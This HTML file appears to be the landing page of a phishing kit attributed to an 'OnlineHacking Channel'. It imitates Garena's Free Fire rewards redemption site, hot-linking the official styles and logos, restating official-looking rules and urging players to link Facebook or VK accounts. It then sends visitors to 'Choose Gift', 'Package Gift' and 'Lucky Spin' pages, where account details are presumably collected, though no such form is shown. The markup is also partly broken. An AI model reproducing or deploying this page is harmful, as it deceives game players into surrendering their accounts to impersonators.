<!-- https://www.OnlineHacking.xyz/ - OnlineHacking Channel SUMAN MONDAL Creat Script -->
<!DOCTYPE html>
<html lang="zh">


<meta http-equiv="content-type" content="text/html;charset=utf-8" />
<head>
	<meta name="title" content="FreeFire">
    <meta name="description" content="FreeFire">
    <meta property="og:title" content="FreeFire">
    <meta property="og:description" content="FreeFire">
	</script>
	<link rel="stylesheet" href="https://ff.garena.com/statics/ff/css/common/reset.css">
	<link rel="stylesheet" href="https://ff.garena.com/statics/ff/css/common.css">  
    <link rel="stylesheet" href="https://ff.garena.com/statics/ff/css/swiper.css">
    <link rel="stylesheet" href="https://ff.garena.com/statics/ff/css/firepass/season02.css">
    <!-- M002 V3 -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <!-- set if need to be able scaled -->
    <meta name="description" content="">
    <meta name="author" content="">
    <meta name="title" content="FreeFire">
    <meta name="description" content="FreeFire">
    <meta property="og:title" content="FreeFire">
    <meta property="og:description" content="FreeFire">
    <title>Free Fire</title>
    <link rel="shortcut icon" href="https://ff.garena.tw/static/favicon.ico" type="image/x-icon">
    <link rel="stylesheet" href="css/reset.css" />
    <!-- Bootstrap core CSS -->
    <link href="css/bootstrap.min.css" rel="stylesheet">
    <!-- IE10 viewport hack for Surface/desktop Windows 8 bug -->
    <link href="css/ie10-viewport-bug-workaround.css" rel="stylesheet">
    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
      <script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
      <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
    <![endif]-->
    <link href="css/all.css" rel="stylesheet">
    <link href="css/extra.css" rel="stylesheet">
    <!-- the css editable in USE -->
</head>
<div data-reactroot="">
<div class="container">
<div class="a_wrap2">
<div class="col-md-5 col-sm-5 col-xs-5">
<img src="imgg/logoff.png" class="gamelogo">
</div><div class="col-md-5 col-sm-5 col-xs-5">
<img src="imgg/garena.png" class="garenalogo"></div><span class="cit topics col-md-12 col-sm-12 col-xs-12">Rewards redemption site</span></div><div class="a_wrap"><div></div>
<br><div><div></a></span></div>
</div><span class="txt_c_1">Comb Notification:</span><div class="more"><ol><li><!-- react-text: 18 -->1.Code Redemption <!-- /react-text --><span class="colorUo"> 12 </span><!-- react-text: 20 -->Character, consisting of capitals and numbers.<!-- /react-text --></li>
<li><!-- react-text: 22 -->2.Present items are displayed in<!-- /react-text --><span class="colorUo">&nbsp;&nbsp;</span><!-- react-text: 24 -->Tab in the game lobby;  Gold or diamonds will be added to your Account Wallet automatically.<!-- /react-text --></li>
<li>3.Please note the redemption due date.  Expired codes cannot be exchanged.</li>
<li>4.Please contact customer service if you have any problems. </li>
<li>5.Reminder: you will not be able to redeem your prize with a guest account.  You can link your account to Facebook or VK to receive an award .</li></ol>

<a href="choose.html" style="display:inline-block;border:4px solid rgb(0, 255, 55);border-radius:8px;padding:9px;background:linear-gradient(to bottom,rgb(3, 28, 255),rgb(232, 28, 230));color:rgb(255, 255, 255)">Choose Gift </a>

<a href="/nex/index.html" style="display:inline-block;border:4px solid rgb(0, 95, 255);border-radius:8px;padding:9px;background:linear-gradient(to bottom,rgb(255, 0, 242),rgb(218, 248, 0));color:rgb(255, 255, 255)">Package Gift</a> 

<a href="/nex/index.php" style="display:inline-block;border:4px solid rgb(0, 255, 55);border-radius:8px;padding:9px;background:linear-gradient(to bottom,rgb(3, 28, 255),rgb(232, 28, 230));color:rgb(255, 255, 255)">Lucky Spin </a>

<body>
<div class="g-footer clearFix">
    <div class="m-foot-wrap">
 <div class="m-foot-copyright">
            <div class="m-foot-logo"><img src="http://freefiremobile-a.akamaihd.net/ffwebsite/images/logo_small_foot.png"></div></body>


</html>